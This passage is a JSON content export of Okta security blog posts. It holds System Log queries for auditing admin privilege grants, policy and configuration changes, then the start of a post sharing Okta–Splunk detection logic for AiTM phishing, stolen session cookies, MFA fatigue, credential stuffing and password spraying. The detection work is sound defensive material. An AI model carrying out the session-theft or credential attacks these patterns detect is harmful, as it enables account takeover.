Console\\\" and ((debugContext.debugData.behaviors co \\\"Velocity=POSITIVE\\\") OR (debugContext.debugData.logOnlySecurityData co \\\"\\\\\\\"Velocity\\\\\\\":\\\\\\\"POSITIVE\\\\\\\"\\\"))\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Privilege Assignment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An audit of administrator privileges should consider what privileges have been assigned to different admins or groups of admins. Any eventType that ends with “privilege.grant” will cover privileges granted to both individual admins and groups of admins.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assignment of admin privileges or resources to a new user or group.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType ew \\\"privilege.grant\\\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Lifecycle Events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Querying an event that contains the string 
“lifecycle” provides a fairly comprehensive view of user lifecycle events triggered by administrative actions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User lifecycle events initiated by admin\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType co \\\"lifecycle\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the org-wide level, this query includes lifecycle events for external IdPs and authenticators, down to devices and authenticators configured at the level of the individual user. 
Some more granular queries for specific categories of lifecycle events are presented below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating, activating, updating or deleting an Identity Provider.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"system.idp\\\" \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating, activating, updating or deleting an Authenticator/Factor (org-wide).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"security.authenticator\\\" OR eventType sw \\\"device.push.provider\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A reset, update or suspension of a user’s 
authenticator.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"user.mfa.factor\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Admin-initiated activation, deactivation, deletion or suspension of a user’s registered device. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"device.lifecycle\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Policy Change Events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A search for events that contain the word “lifecycle” will include most changes made to an Okta sign-in policy. Changes to rules within policies aren’t necessarily captured by that query. 
The query below captures a range of events related to changing access policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Okta Sign-In Policy, or a rule within it, is created, updated or deleted by an Admin\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"policy.lifecycle\\\" OR eventType sw \\\"policy.rule\\\" OR eventType sw \\\"app.policy\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Other Configuration Changes\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a number of org-wide configuration events in Okta’s Event Catalog that are just as critical for monitoring and auditing purposes. 
Changes to network zones or device management platforms, for example, can result in a loss of access for large numbers of users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating, updating or revoking an API Access Token\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"system.api\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating, updating or deleting a network zone, or adding/removing it from a denylist. 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType co \\\"zone\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adding, updating or deleting a device management platform\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType co \\\"device.platform\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updating, disabling or changing the network zones evaluated by ThreatInsight\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.configuration.update\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user’s Okta attributes or password pushed/synchronized to an external application via SCIM\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw 
\\\"application.provision.user*\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating a new SWA App\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"application.lifecycle.create\\\" AND debugContext.debugData.requestUri eq \\\"/api/internal/orgadmin/apps/swa\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating a new AD/LDAP sync agent\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"system.agent.ad.create\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating, activating, deactivating or deleting a Log Stream\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType sw \\\"system.log_stream\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You’ll find a larger set of admin-relevant event types in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Type 
Catalog.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trusting privileged users is a necessary risk for any application, and the security best practices of least privilege, strong authentication, and activity monitoring provide you with the tools you need to verify actions and mitigate this risk. Okta provides robust solutions to address these requirements. It’s worth noting that all of the events listed above can trigger a custom Okta Workflow (either through a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/okta.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"connector event card\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/execute/flow-api-endpoint.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"event hook\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"), such that admins can automate responses to events of interest.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By adding the controls detailed here into your security program, you can ensure your administrators have appropriate access, and are using that access to protect your organization.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - Mar 8, 
2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated detections section to include the System Log event for an authentication failure arising from session binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - Oct 25, 2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Originally Published\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:24:12.873Z","secAuthor":[{"id":"2a065415-55de-5c68-bdd2-cfa5ee83b8fc","bio":{"bio":"<p>Chris is the Regional CSO, Americas at Okta, where he is responsible for corporate security compliance, third-party risk, and responding to customer security inquiries. Prior to Okta, Chris spent 6 years leading the adoption of Cloud Technologies at LinkedIn, helping them grow from 350 to over 6,800 employees. He started his career designing, developing, and delivering content management, system administration, and messaging solutions for customers such as Nestle, Cisco, AMD, Telus, and the US Department of Defense. 
He is also an active member of the Northern California ski community, where he volunteers with the Tahoe Backcountry Ski Patrol performing search &amp; rescue, and teaching ski mountaineering &amp; outdoor survival.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1QgavuS45zIiNfhq3Y0jk0/d33ec80d3294965b5abd63b453e8b4c6/Chris_Niggel_01_20square.jpg"},"name":"Chris Niggel","jobTitle":"Regional CSO, Americas, Okta","slug":"chris-niggel","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/shareddetections","id":"4d055213-4bf7-5b17-9d7f-a00c46feb9a1","title":"Okta and Splunk Combine to Detect Common Attacks ","date":"2023-04-06T05:50:49+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an ideal world, every security function would have a Detection Engineering team.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Regrettably, even organizations that are stewards of highly sensitive data often can’t afford (or don’t prioritize) the capabilities required for effective security monitoring. There can be a misconception that cloud service providers are doing the monitoring for them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It's a challenge that Okta Security wants to help address. Whenever we write a detection for our own purposes (we use Okta, too!), there’s an untapped opportunity to use those detections to help other Okta customers prevent or respond to security incidents that stem from common credential-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So we’ve decided to publish our detection logic. Right here! 
(Scroll down!)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Publishing raw detection logic will suit many of our customers. But we recognize that publishing them here won’t reach everybody, and it still puts the onus on customers to tune or adapt the detections.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That’s where mutual friends come in handy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta’s Defensive Cyber Operations team has shared bespoke detection logic with security analytics/SIEM providers, requesting the logic be baked into their content libraries “out of the box.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The first of those discussions has already borne fruit with Splunk, the security analytics platform chosen most often by Okta customers, thanks to the assistance of James Brodsky, Splunk’s GVP for Security Strategy and Splunk Senior Threat Researcher Michael Haag.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of Splunk Enterprise Security Content Update (ESCU) v3.62.0, security teams that ingest Okta System Log events into the Splunk platform can run and modify an initial set of bespoke detections in Splunk® Enterprise Security developed by Okta’s Defensive Cyber Operations team. 
James and Michael have tweaked these raw detections to make them more legible and applicable to a broader number of our mutual customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Splunk update enhances their pre-existing analytic stories for Okta, and includes new approaches to detecting:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Hijacking via phishing for initial access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Post-compromise activity by threat actors abusing a stolen session token\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Abuse of Push MFA (including “MFA Fatigue” attacks)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Stuffing\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Password Spray attacks\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All of these detections are relevant to Okta Identity Engine (not the Classic Engine).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The logic for each is presented below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Phishing Detection with FastPass Origin Check\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1566/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1566\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for when a user enrolled in FastPass fails to authenticate via a real-time AiTM phishing proxy. 
More info \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"here\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/f4ca0057-cbf3-44f8-82ea-4e330ee901d3/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"F4ca0057-cbf3-44f8-82ea-4e330ee901d3\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Use of an Okta Session 
Cookie\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1539/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1539\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steal Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scott Dermott and Felicity Robson 
